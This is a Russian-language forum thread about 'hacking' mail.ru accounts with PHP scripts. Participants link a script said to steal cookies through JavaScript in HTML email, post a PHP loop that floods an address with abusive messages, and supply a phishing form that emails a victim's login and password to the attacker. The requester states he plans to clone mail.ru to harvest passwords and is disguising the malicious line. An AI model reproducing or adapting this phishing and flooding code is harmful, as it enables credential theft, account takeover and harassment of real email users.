Просмотр полной версии : Php скриптом
Вот я нарыл php скрипт ломает mail.ru :)
Вот я выложил на сайт се но хост PHP не очень любит :)
Кто нибудь проверти что там в скрипте :)
Качаем : тут (http://www.lpfan.h14.ru/mail.zip) :p
Так ты толком не знаешь что это за скрипт?
+ Он сам взломает мэйл.ру ? =))
Помоему эти скрипты способны токо куки вытаскивать......
Там 2 скрипта. Второй из них посылает java скрипт в теле письма, подробнее о таком способе читайте в статье взлом mail.ru на АНТИЧАТЕ
Вроде еще и видио было... Хотя не уверен...
А его кто нибуть выкладывал если да то дайте ссылку !?
ну, скрипты эти максимум только принимают куки и реффереры
В каком месте ты там это нашел? Они ни чего не принимают, они только посылают мыло с html'ным телом.
я туда даже не заглянул, я просто знаю, для чего обычно нужны подобные скрипты...
Plzz посоветуйте скрипт для отправки мыла............
mail('кому отправить надо','Имя сообщения','Сообщение', "Content-type: text/html\r\nFrom: ameli@yahoo.com(отправляеый ящик)\r\n")
Если надо флудер то так
?>
$lol="admin@mail.ru"; //кому
$tema="fuck off"; // тема письма
$f="fuck"; // Само письмо
$kolvo="10"; // сколько писем отправить
for($i=1; $i<=$kolvo; $i++)
{
mail("$lol", "$tema", "$f");
}
?>
А можно более подробно........ просто я собираюсь создать сайт копию mail.ru и чтоб когда юзер введет пороль содержимое формы ушло мне на мыло. А зачем ameli@yahoo.com???
зделай форуму в ней переменную и успловие и через mail(отправляй)
а вообше мне кажеться надо чтобы писалось в файл так будет легче...-)
<html>
<form action="" method="post">
<input name="login">
<input name="pass">
<input type="submit"">
</form>
<?php
$mail="фывфыв"; //твоё мыло
$kk="lol";
mail("$mail","$kk","$login$pass");
?>
2em00s7 трудно всё в один пост написать?
Zinger нет -))) только щас я посчитал нужным написать в 3 сообщения...-))
хз как майл.ру МДААААААА. долго смеялся, кстати смех продлевает жизнь, учитывая твои знания, тебе лучще кого-нить нанять. советую =)
Sn@k3 да ладно тебе видеш человек хочет заниматься Си и воровать мыла))))
Sn@k3 да ладно тебе видеш человек хочет заниматься Си и воровать мыла))))
Thanks за подержку!
хз как майл.ру МДААААААА. долго смеялся, кстати смех продлевает жизнь, учитывая твои знания, тебе лучще кого-нить нанять. советую =)
Что чел считаеш себя самым умным... Сидиш тут пиздиш.. Что разве у тебя есть другие идеи как стощить пас от мыла. Наверное предложиш брутфорс и подкинуть троя... Чел как это по ламерски.. Что косается моих познаний то будь уверен знаю не мало если взомал не один десяток компов.
Что косается создать сайт ловушку то это вполне реально......... Может тебе слобо
Stoker замени форму на мою и всё гатова ))) только тебе нужен хост с поддершкой php и включённая функция mail()
Thanks... хостинг нашел... скрипт рулит.. Осталось дело за малым замаскировать нехорошую строку в HTML коде письма над чем сейчас и работаю. Буду блогодарен за содействие.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot